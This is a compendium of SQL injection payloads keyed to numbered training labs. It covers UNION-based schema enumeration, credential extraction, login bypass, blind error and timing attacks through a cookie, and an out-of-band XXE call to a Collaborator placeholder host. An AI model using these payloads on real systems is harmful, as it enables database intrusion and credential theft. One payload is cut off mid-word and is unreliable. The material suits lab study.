[SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
##### SQL Injection β Bypass `released = 1` filter via `category` param
```
' OR 1=1--
```
Context: Injected into `category` query parameter
Encoding: URL-decoded in server-side SQL statement
Source: [[1. SQL injection vulnerability in WHERE clause allowing retrieval of hidden data]]
---
##### SQL Injection β Bypass login via `username` field
```
administrator'--
```
Context: Injected into `username` field of login form
Encoding: None β raw SQL concatenation
Source: [[2. SQL injection vulnerability allowing login bypass]]
---
##### SQL Injection β Extract DB version via UNION on Oracle
```
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
```
Context: Injected into `category` query parameter; Oracle SQL backend
Encoding: URL-encoded in HTTP GET request
Source: [[3. SQL injection attack, querying the database type and version on Oracle]]
---
##### SQL Injection β Retrieve DB version via `@@version` (MySQL / MSSQL)
```
'+UNION+SELECT+@@version,+NULL#
```
Context: Injected into `category` query param; UNION SELECT with 2 text columns
Encoding: URL-encoded in HTTP GET request
Source: [[4. SQL injection attack, querying the database type and version on MySQL and Microsoft]]
---
##### SQL Injection β Full DB enumeration via `information_schema` (non-Oracle)
```
'+UNION+SELECT+username,<password_column>+FROM+<user_table>--
```
Supporting queries:
- **Determine column count & type**:
```
'+UNION+SELECT+'a','b'--
```
- **List tables**:
```
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
```
- **List columns** (adjust table name):
```
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='<user_table>'--
```
Context: Injected into `category` query parameter; 2-column UNION SELECT
Encoding: URL-encoded in HTTP GET request
Source: [[5. SQL injection attack, listing the database contents on non-Oracle databases]]
---
##### SQL Injection β Extract admin creds via Oracle `all_tables` and `all_tab_columns`
```
'+UNION+SELECT+USERNAME_DEFISP,PASSWORD_IXHNTC+FROM+USERS_QGUNNK--
```
Supporting enumeration queries:
- **Confirm column count (2 text fields)**:
```
'+UNION+SELECT+'abc','def'+FROM+dual--
```
- **List all tables**:
```
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
```
- **List columns in discovered table**:
```
'+UNION+SELECT+column_name,NULL+FROM+all_t
```
Context: Injected into `category` query parameter; Oracle SQL backend
Encoding: URL-encoded in HTTP GET request
Source: [[6. SQL injection attack, listing the database contents on Oracle]]
##### SQL Injection β Determine column count via `NULL`-based UNION probing
```
'+UNION+SELECT+NULL,NULL,NULL--
```
Context: Injected into `category` query parameter; increasing `NULL`s to match column count
Encoding: URL-encoded in HTTP GET request
Source: [[7. SQL injection UNION attack, determining the number of columns returned by the query]]
##### SQL Injection β Identify text-compatible column via string injection
```
'+UNION+SELECT+NULL,'tO0HJO',NULL--
```
Context: Injected into `category` query param; probing for string-compatible column
Encoding: URL-encoded in HTTP GET request
Source: [[8. SQL injection UNION attack, finding a column containing text]]
---
##### SQL Injection β Extract `administrator` credentials from `users` via UNION
```
'+UNION+SELECT+username,password+FROM+users--
```
Context: Injected into `category` query parameter; UNION SELECT over 2 text-compatible columns
Encoding: URL-encoded in HTTP GET request
Source: [[9. SQL injection UNION attack, retrieving data from other tables]]
Hereβs the compendium slice for this lab focused on extracting **multiple values via single-column output** using string concatenation:
---
##### SQL Injection β Extract credentials via concatenation into single text column
```
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
```
Context: Injected into `category` query parameter; 2-column query where only **one** supports text output
Encoding: URL-encoded in HTTP GET request
Source: [[10. SQL injection UNION attack, retrieving multiple values in a single column]]
---
##### Blind SQL Injection β Oracle error-based password extraction via `TrackingId` cookie
```
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
```
Context: Injected into `TrackingId` cookie; Oracle SQL; inference via **conditional 500 error** (division by zero)
Encoding: Raw cookie injection
Source: [[12. Blind SQL injection with conditional errors]]
---
##### SQL Injection β Leak admin password via error-based casting in cookie
```
TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
```
Context: Injected into `TrackingId` cookie; verbose SQL errors in response expose query structure and data
Encoding: Raw cookie injection
Source: [[13. Visible error-based SQL injection]]
---
##### Blind SQL Injection β Trigger conditional delay via `pg_sleep()` (PostgreSQL)
```
TrackingId=x'||pg_sleep(10)--
```
Context: Injected into `TrackingId` cookie; PostgreSQL backend
Encoding: Raw cookie injection
Source: [[14. Blind SQL injection with time delays]]
---
##### Blind SQL Injection β Extract admin password via `pg_sleep()` timing (PostgreSQL)
```
TrackingId=x';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
```
Context: Injected into `TrackingId` cookie; **no visible output**, but inference via **response delay**
Encoding: URL-encoded (`%3B` for `;`, etc.); raw value when testing in Burp
Source: [[15. Blind SQL injection with time delays and information retrieval]]
---
##### Blind SQL Injection β Oracle `EXTRACTVALUE()` triggers OOB DNS via XXE
```
TrackingId=x';SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://<YOUR-COLLABORATOR-ID>.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual--
```
Context: Injected into `TrackingId` cookie; **blind SQLi with DNS-based out-of-band verification** via Burp Collaborator
Encoding: URL-encoded (`%3C`, `%3E`, `%3F`, etc.); raw value when testing in Burp
Source: [[16. Blind SQL injection with out-of-band interaction]]